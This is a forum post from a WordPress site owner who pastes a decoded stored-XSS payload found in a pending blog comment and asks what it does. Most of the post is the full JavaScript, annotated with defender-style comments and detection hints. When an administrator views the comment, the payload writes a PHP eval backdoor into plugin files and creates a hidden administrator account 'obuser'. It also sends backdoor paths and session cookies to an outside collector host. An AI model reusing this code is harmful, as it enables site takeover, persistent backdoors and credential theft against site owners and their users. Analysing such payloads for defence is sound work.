Is this a "Hello-World" blog post hack of some kind?
Dear community,
I’m running the latest WP and today I think someone is trying to hack my site. I thought I’d post what I’ve found to see how dangerous you think it is and perhaps protect others from the same thing.
I was suspicious after receiving an automated email from my site saying that a comment needed moderation. The email contained embedded code encoded in what appeared to be base64. The first few lines looked like this:
A new comment on the post “Hello world!” is waiting for your approval
https://***my_web_site***/hello-world/Author: meyer (IP: 52.33.164.81, ec2-52-33-164-81.us-west-2.compute.amazonaws.com)
Email: [email protected]
URL: https://www.facebook.com/pafghijn
Comment:
hellonice odszov<abbr><a href=’
href=”‘> ?? <abbr title='” onmouseover=”var file = ""; var xurl = "plugin-edi
Decoding the base64 revealed the following code, which appeared to run on mouseover of the smiley-face characters (note: I altered the code below so that it doesn’t result in an href link or a mouseover event in this post!):
Can anyone tell me what this is doing (or has done!), as I’m not that great at PHP?
hellonice odszov<abbr><a h*ref=’
h*ref=”‘> ?? <abbr title='” on*mouse*over=”
// Defender's reading of the payload's setup. The code is kept exactly as
// pasted (the forum replaced straight quotes with curly ones, so it does not
// parse as-is).
// `file` is filled in later from the plugin editor page with the name of the
// plugin file the editor currently has open.
var file = “”;
// Both targets are WordPress admin pages: the plugin file editor and the
// "Add New User" screen. The requests go out with whatever session cookie the
// viewing browser holds, so they only succeed if the viewer is logged in with
// the matching capabilities (presumably an administrator reading the
// moderation queue — confirm against your own access logs).
var xurl = “plugin-editor.php”;
var Aurl = “user-new.php”;
// file2: every plugin file listed in the editor's <select> (see GetAllShell).
// shell: status lines collected for exfiltration.
var file2= [];
var shell= [];
// Collection endpoint; SenData() POSTs results (and, on one path, the
// document.cookie value) here. The original trailing comment was non-ASCII
// and is garbled in the paste.
var recieve=”https://g.fr9.co/xss/recieve.php”;//recieve.php ???????
// Non-zero: after the currently open file, also try every other plugin file.
var StartGetshell = 1; //??getshell???? 1?? 0??
// PHP backdoor text that gets spliced in place of a plugin file's opening
// <?php tag. It is gated on POST parameter 'dak'; str_rot13('riny') spells
// 'eval', and preg_replace with the /e modifier evaluates the replacement as
// PHP (the /e modifier was removed in PHP 7.0, so on newer PHP this part is
// inert, but the file is still modified). Infected plugin files can be found by
// searching wp-content/plugins for $_POST['dak'] or the '/ad/e' pattern.
var shellcode = “<?php\nif(isset($_POST[‘dak’])){($www = $_POST[‘dak’]) && @preg_replace(‘/ad/e’, ‘@’ . str_rot13(‘riny’) . ‘($www)’, ‘add’);exit;}”;
// Tail of the current URL from "wp-admin" onward; replaced later to turn the
// admin URL into the public wp-content/plugins/<file> URL of the backdoor.
var tempname = location.href.substring(location.href.indexOf(‘wp-admin’),location.href.length);
// Third-party hit counter pinged from adduser(); acts as a second beacon.
// The block below wraps window.setTimeout so that extra arguments are passed
// through to the callback (used at the bottom of fuckxss with a string arg).
// window.x doubles as a run-once guard (also checked at the end of the script).
var laurl = “https://web.51.la:82/go.asp”;if(!window.x){
var _st = window.setTimeout;
window.setTimeout = function(fRef, mDelay) {
if(typeof fRef == ‘function’){
// Forward any arguments after the delay to fRef.
var argu = Array.prototype.slice.call(arguments,2);
var f = (function(){ fRef.apply(null, argu); });
return _st(f, mDelay);
}
return _st(fRef,mDelay);
}
}
// Stage 1: load the plugin editor, harvest its nonce and the currently open
// plugin file, and write the backdoor into that file. Also collects the list
// of every other plugin file for stage 2 (GetAllShell). Requires jQuery, which
// wp-admin pages normally have loaded.
function fuckxss(){
// Unused.
var tempshell = “”;
jQuery.ajax({
url: xurl,
type: ‘GET’,
dataType: ‘html’,
data: {},
})
.done(function(data) {
var temp = jQuery(data);
var Xtoken = “”;
var Tmpcode = “”;
// WordPress CSRF nonce for the editor form, taken from the page itself, so
// the nonce check offers no protection once script runs in the admin session.
temp.find(‘input#_wpnonce’).each(function(i,o){
var o=jQuery(o);
Xtoken=o.attr(‘value’);
});
// Name of the plugin file the editor currently shows.
temp.find(‘div.alignleft big strong’).each(function(i,o){
var o=jQuery(o);
file = o.text();
});
temp.find(‘textarea#newcontent’).each(function(i,o){
var o=jQuery(o);
// Already infected: report the backdoor's public path together with the
// admin's cookies (the only place document.cookie is exfiltrated), and stop.
// Because `return false` skips the assignment below, Tmpcode stays empty and
// no second write happens. If you saw this code run, treat the session
// cookies as compromised and rotate them.
if(o.text().indexOf(‘$www = $_POST[\’dak\’]’)>0){
SenData(‘shell has presence,Path: ‘+location.href.replace(tempname,”wp-content/plugins/”+file)+” Password: dak\r\nCookie: “+document.cookie);
return false;
}
// Otherwise splice the backdoor in place of the file's first <?php tag.
Tmpcode = o.text().replace(‘<?php’,shellcode);
});
// Every plugin file offered by the editor's file selector.
temp.find(‘select#plugin option’).each(function(i,o){
var o=jQuery(o);
file2.push(o.attr(‘value’));
});
// Save the modified file through the editor's own update action.
if(Xtoken&&Tmpcode&&file){
jQuery.ajax({
url: xurl,
type: ‘POST’,
data: {‘_wpnonce’:Xtoken,’newcontent’:Tmpcode,’action’:’update’,’file’:file,’plugin’:file,’submit’:’Update+File’}
})
.done(function(){
SenData(‘Webshell: ‘+location.href.replace(tempname,”wp-content/plugins/”+file)+” Password: dak”);
return;
})
}
// Stage 2: schedule GetAllShell for every listed file; the argument carries
// "<file>|<last file>" so the callee can tell when it has reached the last one.
// All timers use the same 150 ms delay, so they effectively run together.
if(StartGetshell){
for(var i=0;i<file2.length;i++){
window.setTimeout(GetAllShell,150,file2[i]+”|”+file2[file2.length-1]);
}
}
})
}
// Stage 2: repeat the editor-based write for one more plugin file.
// target is "<filename>|<last filename>" (built in fuckxss). Results are
// appended to `shell` and only flushed to the collector when the file being
// processed is the last one in the list; with all timers firing at once that
// flush may not include every other file's outcome (inferred from the timing,
// not something the code guarantees).
function GetAllShell(target){
var TmpArr = target.split(“|”)[1];
var filename = target.split(“|”)[0];
// The file already handled by fuckxss is skipped.
if(filename!=file){
// Ask the editor to open `filename`, which returns the editor page for it.
jQuery.ajax({
url: xurl,
type: ‘POST’,
data: {‘plugin’: filename,’Submit’:’Select’},
})
.done(function(data) {
var NewCode = “”;
var NewToken= “”;
var Getshell=jQuery(data);
Getshell.find(“textarea#newcontent”).each(function(i,o){
var o=jQuery(o);
// Already infected: record the path and stop without rewriting.
if(o.text().indexOf(‘$www = $_POST[\’dak\’]’)>0){
shell.push(‘shell has presence,Path: ‘+location.href.replace(tempname,”wp-content/plugins/”+filename)+” Password: dak”);
console.log(filename+” x “+TmpArr);
if(filename==TmpArr){
SenData(shell.join(“\r\n”));
}
return false;
}
NewCode = o.text().replace(‘<?php’,shellcode);
});
// Fresh nonce for this editor page.
Getshell.find(“input#_wpnonce”).each(function(i,o){
var o=jQuery(o);
NewToken = o.attr(‘value’);
});
if(NewCode&&NewToken){
jQuery.ajax({
url: xurl,
type: ‘POST’,
data: {‘_wpnonce’:NewToken,’newcontent’:NewCode,’action’:’update’,’file’:filename,’plugin’:filename,’submit’:’Update+File’}
})
.done(function(){
shell.push(‘Webshell: ‘+location.href.replace(tempname,”wp-content/plugins/”+filename)+” Password: dak”);
// The console.log calls are the only local trace this stage leaves in
// the browser; the server-side trace is the modified plugin files.
console.log(filename+” “+TmpArr);
if(filename==TmpArr){
SenData(shell.join(“\r\n”));
}
return;
})
.fail(function(){
// Failures are recorded but only sent if a later flush happens.
shell.push(location.href+’: GetShell ‘+filename+’ Failure’);
})
}
})
}
}
// Creates a persistent administrator account through the normal "Add New
// User" form, using the form's own nonce. Detection: look for a user named
// 'obuser' (the email was redacted by the forum) and for POSTs to
// user-new.php with action=createuser in the access logs. Note the createuser
// POST is sent even if no nonce was found, in which case WordPress rejects it.
function adduser(){
jQuery.ajax({
url: Aurl,
type: ‘GET’,
dataType: ‘html’,
data: {},
})
.done(function(data) {
var temp = jQuery(data);
var Xtoken = “”;
temp.find(‘input#_wpnonce_create-user’).each(function(i,o){
var o=jQuery(o);
Xtoken=o.attr(‘value’);
});
// Credentials are hard-coded (user 'obuser', password 'obpass', role
// administrator). Several field values were mangled to a lone ” by the paste.
jQuery.ajax({
url: Aurl,
type: ‘POST’,
data: {‘action’: ‘createuser’,’_wpnonce_create-user’:Xtoken,’user_login’:’obuser’,’email’:’[email protected]’,’first_name’:”,’last_name’:”,’url’:”,’pass1′:’obpass’,’pass2′:’obpass’,’role’:’administrator’,’createuser’:’Add+New+User+’}
})
.done(function(){
SenData(location.href+’: Add Administrator success User: obuser Password: obpass’+’\r\n\r\n’);
});
// Beacon to a third-party counter with the victim's current admin URL.
jQuery.ajax({
url: laurl,
type: ‘GET’,
data: {‘svid’:13,’id’:18646852,’vpage’:location.href}
})
})
}
// Exfiltration helper: fire-and-forget POST of `data` (as form field "Data")
// to the collector URL in `recieve`. No success or error handling, so nothing
// is logged locally; outbound requests to that host are the indicator.
function SenData(data){
jQuery.ajax({
url: recieve,
type: ‘POST’,
data:{“Data”:data}
})
}
// Entry point: run-once guard on window.x, then both stages in parallel —
// backdoor the plugin files and add the administrator account.
if(!window.x){window.x=1;fuckxss();adduser();};